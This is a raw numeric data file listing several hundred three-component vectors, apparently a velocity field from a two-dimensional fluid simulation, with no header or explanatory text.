(0.1872213105 0.32489021538 0)
(0.193084784174 0.321305792071 0)
(0.198608748954 0.317170280154 0)
(0.203634915372 0.312230557036 0)
(0.207927155061 0.306169239879 0)
(0.21118151005 0.298669012379 0)
(0.213059153039 0.289486518971 0)
(0.21322839484 0.278505197536 0)
(0.211400684437 0.265752571182 0)
(0.207352810288 0.251385149223 0)
(0.200932910108 0.235652452466 0)
(0.192057150129 0.218854178108 0)
(0.18069541558 0.201293807941 0)
(0.166855787871 0.183244881558 0)
(0.150594000617 0.164887355201 0)
(0.131859506014 0.146305918859 0)
(0.110711491619 0.127531133038 0)
(0.0871602279371 0.106965062407 0)
(0.0621087689277 0.0835802352515 0)
(0.0033237836513 0.00645605435499 0)
(-0.000435898635013 0.000818933309472 0)
(-9.92866397435e-06 -0.0027523051163 0)
(-3.9634150328e-05 -0.00277463836303 0)
(-6.65003176955e-05 -0.00275258960721 0)
(-0.000116434384666 -0.00268069498992 0)
(-0.000182882404081 -0.00262582585292 0)
(-0.000212773406143 -0.00263288392014 0)
(-0.000205335129161 -0.00261539205903 0)
(-0.000203187617126 -0.00262863854187 0)
(-0.000221382116993 -0.00263420779908 0)
(-0.000240123198352 -0.00262694843145 0)
(-0.000253855251158 -0.00265518206383 0)
(-0.00027042644998 -0.00262817022153 0)
(-0.000303111034011 -0.00261574583305 0)
(-0.000349089683327 -0.00253221183911 0)
(-0.000412531600441 -0.00246222887633 0)
(-0.000446486848202 -0.00240709048897 0)
(-0.000469929603507 -0.00240253024857 0)
(-0.000489999138257 -0.00232360434339 0)
(-0.000512355812204 -0.00229393296907 0)
(-0.000515108488904 -0.00228667299367 0)
(-0.000526088465427 -0.00229322866726 0)
(-0.00053467152703 -0.00221719799531 0)
(-0.000548526975654 -0.00219638237621 0)
(-0.000556024591567 -0.00217849308703 0)
(-0.000567506150055 -0.00215676881219 0)
(-0.000570347938602 -0.00212890362692 0)
(-0.000573113021227 -0.00212305458323 0)
(-0.000563764732787 -0.00208640460325 0)
(-0.000561827663712 -0.00208264005981 0)
(-0.000552685580481 -0.00205707074194 0)
(-0.000556151526749 -0.00206537448347 3.89953822169e-29)
(-0.000562146021395 -0.00207738575926 -3.69959304045e-29)
(-0.000565404784949 -0.00209750486203 0)
(-0.000563188497741 -0.00211375453774 0)
(-0.000572017596366 -0.00214980495895 0)
(-0.000572744512211 -0.00217720954282 0)
(-0.000550845041882 -0.00215775718553 0)
(-0.000567161370498 -0.00225478659055 0)
(-0.000594160424259 -0.00254709349138 0)
(-0.000826877741635 -0.00296132160377 0)
(-0.00153056718678 -0.00389567645848 0)
(0.0025664056217 0.148449230034 0)
(0.0311224228634 0.235181331286 0)
(0.0491841073426 0.287076758338 0)
(0.065390371007 0.318647621672 0)
(0.0790561103442 0.336979209546 0)
(0.0905016522491 0.346860304182 0)
(0.100308195166 0.351596953013 0)
(0.108975592975 0.353321094207 0)
(0.116883520295 0.353338261956 -6.0434919747e-29)
(0.124302480339 0.352408031219 0)
(0.131409838685 0.35094733336 0)
(0.138312968369 0.349169441236 0)
(0.145071322123 0.347172561224 0)
(0.151712564602 0.34499193239 0)
(0.158243697572 0.342628856626 0)
(0.164656919181 0.340064698527 0)
(0.170932903927 0.337267000209 0)
(0.177040509202 0.334188764236 0)
(0.182935194263 0.330761827379 0)
(0.188550897621 0.326864875192 0)
(0.193774438531 0.322278672429 0)
(0.198414198411 0.316672698464 0)
(0.202188480998 0.30965276414 0)
(0.204747674785 0.300852291575 0)
(0.205721189582 0.290022005023 0)
(0.204768500398 0.277081738019 0)
(0.20161704897 0.26212469397 0)
(0.196081298374 0.24538569807 0)
(0.188062761185 0.227191075777 0)
(0.177543032389 0.207907809512 0)
(0.164562494206 0.187892727895 0)
(0.1492149403 0.167468505972 0)
(0.131662619352 0.146836708481 0)
(0.111896148819 0.126181413258 0)
(0.0905700858546 0.105466390832 0)
(0.0674163419784 0.0800969318831 0)
(0.0277532743162 0.0482830014631 0)
(6.49337233765e-05 0.00141163264338 0)
(0.00099401944699 0.000157180142983 0)
(-7.08270628599e-07 -0.0027666868123 0)
(-1.5947893313e-05 -0.00280552346122 0)
(-4.6068812334e-05 -0.00277060394697 0)
(-9.71560361162e-05 -0.00276874974238 0)
(-0.000172563801327 -0.00269243308736 0)
(-0.000224786018293 -0.00261191069692 0)
(-0.000225240366037 -0.00256629516812 0)
(-0.000218565832893 -0.00262005225852 0)
(-0.000225959159632 -0.00264993632406 0)
(-0.000243718018462 -0.00265128213013 0)
(-0.000255168453598 -0.00265106509131 0)
(-0.000271761723695 -0.00267098769197 0)
(-0.000288743545249 -0.0026221295996 0)
(-0.000322477469709 -0.00261845405301 0)
(-0.000370033336838 -0.00254346908328 0)
(-0.000419933107732 -0.00244561822087 0)
(-0.000447007091717 -0.00239023506144 0)
(-0.000464980178344 -0.00238379831763 0)
(-0.000480040052918 -0.00231179085738 0)
(-0.000493393180563 -0.0022813571721 0)
(-0.000490308517833 -0.00226583582189 0)
(-0.00049634658955 -0.0022677818774 0)
(-0.000499899618998 -0.00219721621374 0)
(-0.000509340796984 -0.00218072801596 0)
(-0.000505752480917 -0.00216011234396 0)
(-0.000495298216233 -0.00212525210712 0)
(-0.000481650739437 -0.00209636804154 0)
(-0.00047168629394 -0.00208275956094 0)
(-0.000459014177506 -0.00206513417579 0)
(-0.000452254544109 -0.0020715181447 0)
(-0.000444060997344 -0.00208873700263 0)
(-0.000426182482276 -0.00208754900708 0)
(-0.000407622784178 -0.0020832283384 0)
(-0.000395446056461 -0.00210700182815 0)
(-0.000379310295379 -0.00214295318383 0)
(-0.000338205552564 -0.00213057170029 0)
(-0.000300562940568 -0.00214955635902 0)
(-0.000297923564942 -0.00218962691631 0)
(-0.000317485776461 -0.00240072631871 0)
(-0.000517344745305 -0.00387183265102 0)
(-0.00162476069861 -0.00435724682771 0)
(0.00567555400067 0.170617809304 0)
(0.0314308442805 0.255010435914 0)
(0.0496000548771 0.304473600418 0)
(0.0650520516512 0.333269940512 0)
(0.078007362684 0.349194257541 0)
(0.0888742270236 0.357217036022 0)
(0.0982132878468 0.360622395105 0)
(0.10652372676 0.361447623814 6.02837266867e-29)
(0.114166933865 0.36088220027 1.1858632013e-28)
(0.121386995549 0.359580716458 -5.80390427822e-29)
(0.128336845712 0.357879459729 0)
(0.135104500784 0.355935410274 0)
(0.14173544675 0.353809610333 0)
(0.1482476842 0.351513064677 0)
(0.154641758772 0.349030741788 0)
(0.160905105493 0.346331492491 0)
(0.167014614629 0.343371553969 0)
(0.172935021535 0.340090968367 0)
(0.17861681178 0.336403477005 0)
(0.183985043394 0.332149829598 0)
(0.188904551216 0.327040623856 0)
(0.193143227562 0.320653225747 0)
(0.196367403872 0.312511586383 0)
(0.198180492994 0.302209508433 0)
(0.1981853899 0.289513166721 0)
(0.196042906094 0.274404631326 0)
(0.191508490809 0.257066435853 0)
(0.18444529458 0.237829482115 0)
(0.174815861228 0.217107724491 0)
(0.162670251694 0.195339711489 0)
(0.148110691846 0.172932620021 0)
(0.131296088467 0.150255774795 0)
(0.112411601179 0.127522388573 0)
(0.0914442508556 0.105204452561 0)
(0.0702461351507 0.0835427510621 0)
(0.0460659029345 0.0534202934358 0)
(0.00075679174718 0.00106542007964 0)
(-0.000243510496201 -0.00205626741745 0)
(0.000216220705792 -0.000976471960342 0)
(7.86971082568e-06 -0.0027692799891 0)
(2.9155573191e-06 -0.00283759877267 0)
(-3.34956862968e-05 -0.00283736144131 0)
(-7.88243221837e-05 -0.00282513732981 0)
(-0.000137349644675 -0.00279393982243 7.68198079821e-29)
(-0.000202337540761 -0.00267147237842 0)
(-0.000243201612167 -0.00255684044199 0)
(-0.000256690588023 -0.00261698739675 0)
(-0.00024957829682 -0.00265509488961 0)
(-0.000255963638121 -0.00266855053354 0)
(-0.000267091491415 -0.00266122534582 0)
(-0.00027412115879 -0.0026796180871 0)
(-0.000286329311177 -0.00263758485279 0)
(-0.000310397007323 -0.00261887511841 0)
(-0.000337777956019 -0.00257874635194 0)
(-0.000382460764205 -0.00253779764727 0)
(-0.000413553064611 -0.00241077658451 0)
(-0.000435549417667 -0.00236154509438 0)
(-0.000449952604847 -0.0023577506559 0)
(-0.000458134855373 -0.00229377050503 0)
(-0.000464994929318 -0.00226116759947 0)
(-0.000458231029242 -0.00224045564375 0)
(-0.000458185741587 -0.00223726656025 0)
(-0.00045172109086 -0.00217675146385 0)
(-0.000440585151583 -0.00214064042563 0)
(-0.000420784967437 -0.00211415606506 0)
(-0.000405180098292 -0.00209498703992 0)
(-0.000389437441526 -0.00208233684842 0)
(-0.000368341363615 -0.00206583563397 0)
(-0.000344732336514 -0.00207211176921 0)
(-0.000308945744853 -0.00204058163919 0)
(-0.000283769763609 -0.00204443114061 0)
(-0.000265973578447 -0.00206618445996 0)
(-0.000251465750489 -0.00210172746413 0)
(-0.000224402056733 -0.00211384863119 0)
(-0.000194819502611 -0.00213845727969 0)
(-0.000175359495214 -0.002210881408 0)
(-0.000136855570218 -0.00249481287708 0)
(-0.000339788474349 -0.00313417389186 0)
(-2.2373662487e-05 -0.00365948792671 0)
(-0.00136960076209 -0.00331601476996 0)
(0.0118079955286 0.191526757143 0)
(0.0327130866072 0.273787619989 0)
(0.0503618013889 0.320911123334 0)
(0.0649392144502 0.347076435693 0)
(0.0770637966268 0.360717141684 0)
(0.0872872298823 0.367017334446 0)
(0.0961367459015 0.369224029046 0)
(0.104085415897 0.369260980338 -5.96000182681e-29)
(0.111463943083 0.368194381968 0)
(0.118484653121 0.366575078123 0)
(0.125274262994 0.364663962403 0)
(0.13190162015 0.362567840929 0)
(0.138399230609 0.360315847482 0)
(0.144776417501 0.357898519044 0)
(0.151028097243 0.355286871076 0)
(0.157137390435 0.352438389673 0)
(0.163077709649 0.349298270908 0)
(0.168809560557 0.345792769422 0)
(0.174278211296 0.341815064261 0)
(0.179398392609 0.33715820259 0)
(0.18400744931 0.331444955393 0)
(0.187824279425 0.324144994579 0)
(0.190456933001 0.314699047811 0)
(0.191462286966 0.302677420799 0)
(0.190424289957 0.28788898282 0)
(0.187016955402 0.270407002003 0)
(0.181036361623 0.250527196602 0)
(0.172405267436 0.228692540953 0)
(0.161155398058 0.205412210943 0)
(0.147411553199 0.181194490447 0)
(0.131334902566 0.156479021607 0)
(0.113134440085 0.131641343544 0)
(0.0928710954996 0.106703811015 0)
(0.0702528994932 0.0821194404586 0)
(0.0476414277279 0.0581684663506 0)
(0.00235757976867 0.00343495565442 0)
(-0.00014266566167 -0.000402501810658 0)
(7.37542092936e-05 -0.00124121381184 0)
(0.000106619907383 -0.00114089437104 0)
(1.04204951651e-05 -0.00275370444197 0)
(8.29265644152e-06 -0.00286716200784 0)
(-2.34477776349e-05 -0.00287859670725 8.11602084711e-29)
(-6.1571464332e-05 -0.00286870056395 0)
(-0.00010510046129 -0.00284343971238 -7.98657938424e-29)
(-0.000167683565774 -0.00276122923573 0)
(-0.000245773428968 -0.00264545881951 0)
(-0.000282500487234 -0.00261132242677 0)
(-0.000276791059461 -0.0026560762969 0)
(-0.000272479399066 -0.00267559444864 0)
(-0.000278876159877 -0.00267824893762 0)
(-0.000281418649643 -0.00266308291401 0)
(-0.000289697833982 -0.00268975352634 0)
(-0.000303826879359 -0.00262907537679 0)
(-0.000323600904302 -0.00261801520065 0)
(-0.000335164125657 -0.00251795848924 0)
(-0.000372365036843 -0.00247287245564 0)
(-0.000403735365223 -0.00237598415863 0)
(-0.000419827650472 -0.00232874534048 0)
(-0.000428901028806 -0.00232160969479 0)
(-0.000427755514348 -0.00226909002344 0)
(-0.000424766835612 -0.00222803443459 0)
(-0.000412656819005 -0.00219742632948 0)
(-0.000394461429674 -0.00218000062785 0)
(-0.000373807328077 -0.00212471595491 0)
(-0.000352021383954 -0.00208800358809 0)
(-0.000330586532601 -0.0020867645718 0)
(-0.000297497299708 -0.00204799315155 0)
(-0.000260603557864 -0.00203942005049 0)
(-0.000214880315007 -0.00199814439114 0)
(-0.000187531119358 -0.00201542486324 0)
(-0.000164584298487 -0.00204030084677 0)
(-0.000137646400632 -0.00206527678095 0)
(-0.000108557389983 -0.00208475015469 0)
(-7.95705920954e-05 -0.00209390590376 0)
(-5.36786510639e-05 -0.00209827523449 0)
(-2.3849175225e-05 -0.00211437499442 0)
(0.000274085343165 -0.00204051234271 0)
(-0.000551556952128 -0.00284878177318 0)
(-0.00155062504147 -0.00298046650312 0)
(-0.0184939392727 -0.0143239784458 0)
(0.0186821100879 0.212143412238 0)
(0.0347645633682 0.291695161125 0)
(0.0512249564728 0.336271901588 0)
(0.0649052554812 0.359958327576 6.62432679215e-29)
(0.0761798449298 0.37149395869 0)
(0.0857385353758 0.376239960238 0)
(0.0940932326034 0.377396035201 0)
(0.101681025239 0.376760543593 0)
(0.108794878925 0.375273830399 0)
(0.115613323486 0.373387783526 0)
(0.122237096437 0.371295283756 0)
(0.128716980943 0.369059937361 0)
(0.13507375945 0.366684318623 0)
(0.141308992479 0.364142027645 0)
(0.147412630927 0.361392207272 0)
(0.153363689095 0.358381829052 0)
(0.159132251415 0.355045078258 0)
(0.16467424462 0.351293266437 0)
(0.16992934354 0.346995934884 0)
(0.174800000484 0.341885596289 0)
(0.179088987765 0.335475742193 0)
(0.182456470154 0.327112824502 0)
(0.184446578536 0.316158365277 0)
(0.184572406298 0.302182752631 0)
(0.182408886624 0.285070297219 0)
(0.177656273116 0.26501635311 0)
(0.170163573026 0.242452928342 0)
(0.159923054112 0.217950009775 0)
(0.147044462342 0.192120778437 0)
(0.131739109542 0.165548473844 0)
(0.114241617993 0.138703869153 0)
(0.0948948892698 0.111948560458 0)
(0.0738527418842 0.0847319189456 0)
(0.050646820429 0.0570834635321 0)
(0.0189789120399 0.0284798638291 0)
(0.00033133365974 -0.000179520800751 0)
(0.00136024896528 -0.00101733117896 0)
(0.00048233862366 -0.00138350066719 0)
(0.000154245558477 -0.00138099374267 0)
(1.30111872362e-06 -0.0027246058283 0)
(-2.35131037182e-06 -0.00288588430722 0)
(-2.02465618193e-05 -0.00290829500831 -8.34670292643e-29)
(-4.82764161817e-05 -0.00291024873857 0)
(-8.30368788507e-05 -0.00288948685844 0)
(-0.000134213840145 -0.00283390268053 0)
(-0.000219026850874 -0.00272010133051 0)
(-0.00028527654357 -0.00261218247826 0)
(-0.000301984795393 -0.00264736573513 0)
(-0.000292087410207 -0.00267616445949 0)
(-0.00029003709624 -0.00268499256398 0)
(-0.000295094517619 -0.00268004550891 0)
(-0.000294697716199 -0.00266383630964 0)
(-0.000304010037812 -0.00268164986008 0)
(-0.000302558672784 -0.00259354958513 0)
(-0.000313704829046 -0.00258809245061 0)
(-0.000336746085987 -0.00248008280223 0)
(-0.000371806184784 -0.00244043496025 0)
(-0.00038479386387 -0.00234528143552 0)
(-0.000400061941593 -0.00229604559604 0)
(-0.000397298200679 -0.00225659417909 0)
(-0.000388022804668 -0.0022553660042 0)
(-0.000362638093418 -0.00217516678227 0)
(-0.000337540830951 -0.00213962641562 0)
(-0.000307849700203 -0.00210367488559 0)
(-0.000281929252506 -0.00206724975533 0)
(-0.000245273584168 -0.00203581741289 0)
(-0.000197764558035 -0.00200972738728 0)
(-0.000147304431648 -0.00196168609096 0)
(-0.000114704326246 -0.00197745044997 0)
(-8.28998279639e-05 -0.00200974338399 0)
(-3.76361174065e-05 -0.0020005636866 0)
(7.16380366126e-06 -0.00201403029859 0)
(4.93723104763e-05 -0.00203168766685 0)
(8.05189938402e-05 -0.00204589925416 0)
(9.95862881548e-05 -0.00205456350465 0)
(7.16505552908e-05 -0.00201093244663 0)
(0.000584074026149 -0.00178896478513 0)
(-0.00266029448948 -0.00703249257644 0)
(-0.0453189713282 -0.0286809777875 0)
(-0.0152124674418 0.0488034248717 0)
(0.0208218512611 0.230316658647 0)
(0.0369298886904 0.308575167216 0)
(0.05206445554 0.350671980327 0)
(0.0648208543482 0.371954392508 -6.44417454787e-29)
(0.075290798362 0.381539916431 0)
(0.0842089278195 0.384896601499 0)
(0.0920826244749 0.385146897516 0)
(0.0993172383772 0.383950199522 0)
(0.106167975831 0.382119608352 0)
(0.112780752055 0.380014043379 0)
(0.119232208283 0.377766344242 0)
(0.125556855954 0.375403858008 0)
(0.131765179496 0.372907583021 0)
(0.137851801302 0.370237281807 0)
(0.143802253564 0.367341948191 0)
(0.149591456719 0.364158586536 0)
(0.155186241149 0.360610186741 0)
(0.1605373878 0.35659161206 0)
(0.165578555529 0.351944990405 0)
(0.170197405813 0.346325526408 0)
(0.174153230844 0.339111895145 0)
(0.177036738404 0.329513241801 0)
(0.178323907767 0.31682318683 0)
(0.177489686845 0.300643886411 0)
(0.174112253228 0.280972324416 0)
(0.167931596915 0.258156630803 0)
(0.158859877798 0.232784714085 0)
(0.146964139696 0.205564451916 0)
(0.132434124643 0.17722173063 0)
(0.115568000326 0.148440011992 0)
(0.0966838183477 0.119784021767 0)
(0.0763949969029 0.0916879704861 0)
(0.0549001968798 0.0624277124088 0)
(0.0303076366945 0.0321331078515 0)
(0.000240356505773 -0.000638737262926 0)
(0.000321243921831 -0.00246830001823 0)
(0.000568278561066 -0.00175431238102 0)
(0.000320352468702 -0.00172746319684 0)
(0.000109694972613 -0.00169134234127 0)
(-1.19094685303e-05 -0.00274379435986 0)
(-1.99315798735e-05 -0.00288874961633 0)
(-2.27528496101e-05 -0.00293031341354 0)
(-4.11183327527e-05 -0.00293577028582 0)
(-6.74615482588e-05 -0.00293093989247 0)
(-0.000110753911471 -0.00289193245345 0)
(-0.000179646658708 -0.00285707904512 0)
(-0.000261858275149 -0.00268345158924 0)
(-0.000314452051842 -0.00262794286784 0)
(-0.000318342229206 -0.0026669073198 0)
(-0.000308308211729 -0.00268334541064 0)
(-0.000304156201933 -0.00268444123714 0)
(-0.000303673306405 -0.00267123011677 0)
(-0.000296616886464 -0.00265740487755 0)
(-0.000296680722871 -0.00259802825032 0)
(-0.000305797467398 -0.00256514861911 0)
(-0.00032290219812 -0.00255888074091 0)
(-0.000333187078194 -0.00243191795398 0)
(-0.000349859956423 -0.00238368670733 0)
(-0.000366721623976 -0.00235024456355 0)
(-0.000361548422167 -0.00223450369808 0)
(-0.00034181637857 -0.00219852927994 0)
(-0.000308771778266 -0.00216645614659 0)
(-0.000277294591637 -0.00211194983378 0)
(-0.000245094597633 -0.00206904212463 0)
(-0.000207919859579 -0.00203535683779 0)
(-0.000158505248851 -0.00198883631796 0)
(-0.00010461714595 -0.0019419481183 0)
(-6.38233014017e-05 -0.00194258371931 0)
(-2.28355840465e-05 -0.001969290205 0)
(3.67859389008e-05 -0.00193658274363 0)
(9.96567864833e-05 -0.00194544398285 0)
(0.000159578895217 -0.00196681921937 0)
(0.000214290253936 -0.00199542636554 0)
(0.000249250364245 -0.00203568058956 0)
(0.00024287491467 -0.00207867611356 0)
(1.70745579993e-05 -0.00211503310023 0)
(0.000700534513354 -0.00215260166505 0)
(-0.0167383632667 -0.0537440396033 0)
(-0.0450802359817 -0.0237656003874 0)
(-0.00663168007655 0.0899029882336 0)
(0.0210666957965 0.249880556436 -9.95073581086e-29)
(0.0381669537539 0.324999459117 0)
(0.0526745499441 0.364347428974 0)
(0.0646521740356 0.383171842796 0)
(0.0743784723036 0.390902130347 0)
(0.0826910447468 0.393012665907 0)
(0.0901032167209 0.392490769562 0)
(0.0969940126728 0.390835507742 0)
(0.103583419925 0.388730748414 0)
(0.109987154 0.386448685689 0)
(0.116260116919 0.384069937402 0)
(0.122422435947 0.381592037915 0)
(0.128475650376 0.378978808389 0)
(0.13440810812 0.37617877303 0)
(0.140201378834 0.373132143553 0)
(0.145826132858 0.369766217549 0)
(0.151246025248 0.365992411382 0)
(0.156405909702 0.361687254444 0)
(0.161233058724 0.356660876989 0)
(0.165597174384 0.350469362601 0)
(0.169203051463 0.342326883837 0)
(0.171560632155 0.331294567122 0)
(0.172075780901 0.31661879841 0)
(0.170194452033 0.297973682952 0)
(0.165512921358 0.27550941248 0)
(0.15782518773 0.249755312984 0)
(0.147115046994 0.221467748227 0)
(0.133523506895 0.191490889493 0)
(0.117302857485 0.160651743845 0)
(0.0987886371267 0.129742762858 0)
(0.0783645514661 0.0994840392918 0)
(0.0571423674073 0.0706229137898 0)
(0.0345949577348 0.0392685744952 0)
(0.000413777659298 -9.7495465103e-05 0)
(-0.000157776461886 -0.00154954841639 0)
(0.000113090889487 -0.00187897790655 0)
(0.000253690642151 -0.00186198332995 0)
(0.000168287937075 -0.00187799708913 0)
(5.72560874241e-05 -0.00183414743616 0)
(-1.245317604e-05 -0.00278383661068 0)
(-2.2886989929e-05 -0.00287815984538 0)
(-2.31692964788e-05 -0.00294006952201 0)
(-3.55245336461e-05 -0.00295252020981 0)
(-5.76738017667e-05 -0.00295560218125 0)
(-9.46044879258e-05 -0.00294641568891 0)
(-0.00014711015464 -0.00287471251963 0)
(-0.000223791213221 -0.00281980653014 0)
(-0.000301891608878 -0.0026660412302 0)
(-0.000343758869283 -0.00265356513266 0)
(-0.000335714052825 -0.0026748193934 0)
(-0.000319261949954 -0.00267994515261 0)
(-0.000310034471227 -0.0026725937343 0)
(-0.000298713075068 -0.00264379043732 0)
(-0.000298022612802 -0.00264149255374 0)
(-0.000304411079922 -0.00256685765823 0)
(-0.000304743720738 -0.00253514007754 0)
(-0.000302805036582 -0.00244778882127 0)
(-0.00031686376576 -0.00238538148297 0)
(-0.000319199180233 -0.00231501507454 0)
(-0.000318497150025 -0.00225810499236 0)
(-0.000292509771295 -0.00216679017583 0)
(-0.000254836908863 -0.00212172770055 0)
(-0.000216803007884 -0.00207526662685 0)
(-0.000181796967977 -0.00204112389409 0)
(-0.00013604069921 -0.00197458138881 0)
(-8.16096886608e-05 -0.0019384123486 0)
(-3.16055999457e-05 -0.00190987821095 0)
(1.78616354636e-05 -0.00191943504536 0)
(8.39654071032e-05 -0.00187791026933 0)
(0.000157883110405 -0.00187564848753 0)
(0.000231058463709 -0.00187563763324 0)
(0.000306906474418 -0.0018932435545 0)
(0.000381737156039 -0.00192896975936 0)
(0.00043906324873 -0.00199615130565 0)
(0.000462323448551 -0.00214246054973 0)
(0.000267849438874 -0.00240945456585 0)
(0.000947151857207 -0.00317571146129 0)
(-0.00979066563218 -0.0744657610307 0)
(-0.0332812509563 -0.0181260798457 0)
(0.00138773758327 0.126619054942 0)
(0.0222535045012 0.268843547812 9.25246651277e-29)
(0.0394916628458 0.340936790953 0)
(0.0533096494658 0.37729857828 0)
(0.0644949601555 0.39362549693 0)
(0.0734729447093 0.399596106067 0)
(0.0811892065381 0.400602032575 5.38407247194e-29)
(0.0881512235332 0.399437456705 -5.31920583555e-29)
(0.0947051250244 0.397420447566 0)
(0.101034595843 0.395105951906 0)
(0.107226620434 0.392686985341 0)
(0.113316283942 0.390199850634 0)
(0.119310899279 0.387618242838 0)
(0.125204189279 0.384892635753 0)
(0.130978702674 0.38196245813 0)
(0.136612455897 0.378760193514 0)
(0.142071567268 0.37520343573 0)
(0.147316686122 0.371191476504 0)
(0.152285722017 0.366580205184 0)
(0.156899362541 0.361142234789 0)
(0.16100537631 0.354306306286 0)
(0.164240600196 0.345088524225 0)
(0.166022845667 0.332397159557 0)
(0.165688992393 0.315463451438 0)
(0.162669019306 0.294082154407 0)
(0.156594877038 0.268599579074 0)
(0.147330864314 0.239752270671 0)
(0.134943807292 0.208472208445 0)
(0.119653237822 0.175727589852 0)
(0.101754989979 0.142403108888 0)
(0.0815407393148 0.109310244879 0)
(0.0593429160787 0.0770178079528 0)
(0.0365381486379 0.046598011368 0)
(0.00117359174124 0.00148145099219 0)
(-0.000173800470151 -0.000970027564597 0)
(-2.34770395794e-05 -0.00140126170056 0)
(3.84958283469e-05 -0.00171272843108 0)
(8.54110137652e-05 -0.00185799692555 0)
(6.59472389033e-05 -0.00194379504607 0)
(2.36242024959e-05 -0.00192468822771 0)
(1.26305197509e-07 -0.00280150396892 0)
(-8.61527535089e-06 -0.0028866694196 0)
(-1.88102748363e-05 -0.00294146192339 0)
(-2.99432568252e-05 -0.00297066706875 0)
(-5.2263667377e-05 -0.00297707911781 0)
(-8.05896924896e-05 -0.00297941162952 0)
(-0.000129538817812 -0.00295792237069 0)
(-0.000196373874509 -0.0028477216081 0)
(-0.000279533769984 -0.00280077757085 0)
(-0.000343046563201 -0.00265710171669 0)
(-0.000365597688712 -0.00265053158366 0)
(-0.000344394531966 -0.00266644983059 0)
(-0.00032422872058 -0.00266439568846 0)
(-0.000312411549014 -0.00264744802653 0)
(-0.000299926612116 -0.00261726813681 0)
(-0.000294320789369 -0.00260859534771 0)
(-0.000285301231352 -0.0025040573516 0)
(-0.000286283545952 -0.00247514915012 0)
(-0.000284926738247 -0.00238503565698 0)
(-0.000285787840951 -0.00235197825878 0)
(-0.000263671846051 -0.00221986327105 0)
(-0.000237582279843 -0.00213406893127 0)
(-0.000201517261988 -0.00208252361891 0)
(-0.000162230784261 -0.00204370880262 0)
(-0.000118167292902 -0.00199576781112 0)
(-6.73158849899e-05 -0.00193997924546 0)
(-1.47686733194e-05 -0.00187538622854 0)
(4.18201837313e-05 -0.00186959585929 0)
(0.000108982618142 -0.0018241818671 0)
(0.000184490308669 -0.00181235610245 0)
(0.000260784186936 -0.00178938103069 0)
(0.000346275801876 -0.00179621929097 0)
(0.000439664892734 -0.00181346643677 0)
(0.000540859831046 -0.00185225356883 0)
(0.000646168809953 -0.00194550983123 2.80208528194e-29)
(0.000760101416354 -0.00212817463773 -2.76884291461e-29)
(0.000749573333186 -0.0024971483261 0)
(0.00143252653769 -0.00433627238178 3.6988185557e-29)
(-0.00595952017039 -0.0928443208642 0)
(-0.0245941165063 -0.0338428402341 0)
(0.00783194541381 0.153306966397 0)
(0.0250681127487 0.28689393843 0)
(0.0413905417037 0.356051211715 0)
(0.0541212183262 0.389331990618 0)
(0.0643822441087 0.403236207004 0)
(0.0725725900812 0.407602109089 0)
(0.0796901770761 0.407666907538 0)
(0.08621079086 0.40599329559 0)
(0.0924353659521 0.403708653959 0)
(0.0985080424045 0.401244993071 0)
(0.104488003979 0.398726021774 0)
(0.110392173933 0.39615202987 0)
(0.116216370843 0.39347849199 0)
(0.121947455723 0.390645876225 0)
(0.127562519779 0.387586277831 0)
(0.133036462542 0.384225241434 0)
(0.138330426039 0.380470430274 0)
(0.143402410815 0.3762082995 0)
(0.148182081579 0.371271321408 0)
(0.152583665035 0.365387991131 0)
(0.15642800402 0.357823381379 0)
(0.159267708159 0.347358831062 0)
(0.160417729467 0.33275383191 0)
(0.159150877911 0.313269699783 0)
(0.154897779163 0.288878164908 0)
(0.147345133019 0.260165164403 0)
(0.136444182251 0.228097864935 0)
(0.122358468193 0.193791457633 0)
(0.105405297239 0.158336870669 0)
(0.0859645046668 0.122651572242 0)
(0.0644235368272 0.0874863340491 0)
(0.0410822699395 0.0527189562717 0)
(0.0113528354692 0.0196014258491 0)
(-6.57981381037e-05 -0.000756346518696 0)
(0.000590855886962 -0.00122471466791 0)
(0.000144051511015 -0.00148009602735 0)
(4.0643782582e-05 -0.00170554489875 0)
(1.30152032515e-05 -0.00185570885285 0)
(1.2778379156e-05 -0.00193574871285 0)
(8.57688285315e-06 -0.00190803355601 0)
(1.13416982803e-05 -0.0027865481251 0)
(8.74854119925e-06 -0.00291380127899 0)
(-1.4037465831e-05 -0.00294753263312 0)
(-3.19261390115e-05 -0.00298804649276 0)
(-5.56348496758e-05 -0.00300110518567 0)
(-8.40331123713e-05 -0.00300884544401 0)
(-0.000118837244112 -0.00300937814931 0)
(-0.000183663096983 -0.00295336194036 0)
(-0.000249682418912 -0.00283650258719 0)
(-0.000320159589977 -0.00277159867361 0)
(-0.000366340260509 -0.00261519437032 0)
(-0.000375527644573 -0.00262826652742 0)
(-0.000350906215952 -0.00264816899836 0)
(-0.000327820868934 -0.00263502517062 0)
(-0.000309767906636 -0.00261046917988 0)
(-0.000288303908853 -0.00256661269284 0)
(-0.000275098210306 -0.00254758875674 0)
(-0.000263566532054 -0.0024411614136 0)
(-0.000258377130162 -0.00241083489748 0)
(-0.000234866149142 -0.00229238303446 0)
(-0.000211710869599 -0.0022165057801 0)
(-0.0001834084287 -0.002102861403 0)
(-0.000150861221872 -0.00204478061988 0)
(-0.000105688817862 -0.00200281076284 0)
(-5.3053277009e-05 -0.00194641104597 0)
(5.95863876284e-07 -0.00187449511828 0)
(5.58159920056e-05 -0.00183633043203 0)
(0.000118706161446 -0.00178164583895 0)
(0.000190595915959 -0.00176210129968 0)
(0.000263745902785 -0.00172985653944 0)
(0.000345964447996 -0.00171790250917 0)
(0.000435473394626 -0.00170177706381 0)
(0.000538971253016 -0.00170323919266 0)
(0.000662647131295 -0.00172524616041 0)
(0.000825563727844 -0.00179782018482 0)
(0.00105315798845 -0.00193348002032 2.73452471036e-29)
(0.00124942320551 -0.0022139661057 0)
(0.0019666111862 -0.00416790099583 -4.05566827426e-29)
(-0.00420250740205 -0.10560724517 0)
(-0.00133082100692 -0.00459044205307 0)
(0.0112596585949 0.169580879586 0)
(0.0283724714115 0.303537395814 0)
(0.0435787138747 0.370097089475 0)
(0.0549752784709 0.400306775542 0)
(0.0642264702339 0.411942433274 0)
(0.0716220449405 0.414908885112 -5.14376859209e-29)
(0.0781554842681 0.414215544253 5.0815593528e-29)
(0.0842522124191 0.41216905693 0)
(0.0901608931054 0.409707435164 0)
(0.0959845828816 0.40715112032 0)
(0.101756230732 0.404566277884 0)
(0.107476462171 0.401925678698 0)
(0.113130923634 0.399171812132 0)
(0.118700538894 0.396238029237 0)
(0.124157246948 0.393050526187 0)
(0.129473379386 0.389528458283 0)
(0.134604572416 0.385569116591 0)
(0.139506827302 0.381045243251 0)
(0.144099896152 0.375762585946 0)
(0.148292182565 0.369397672913 0)
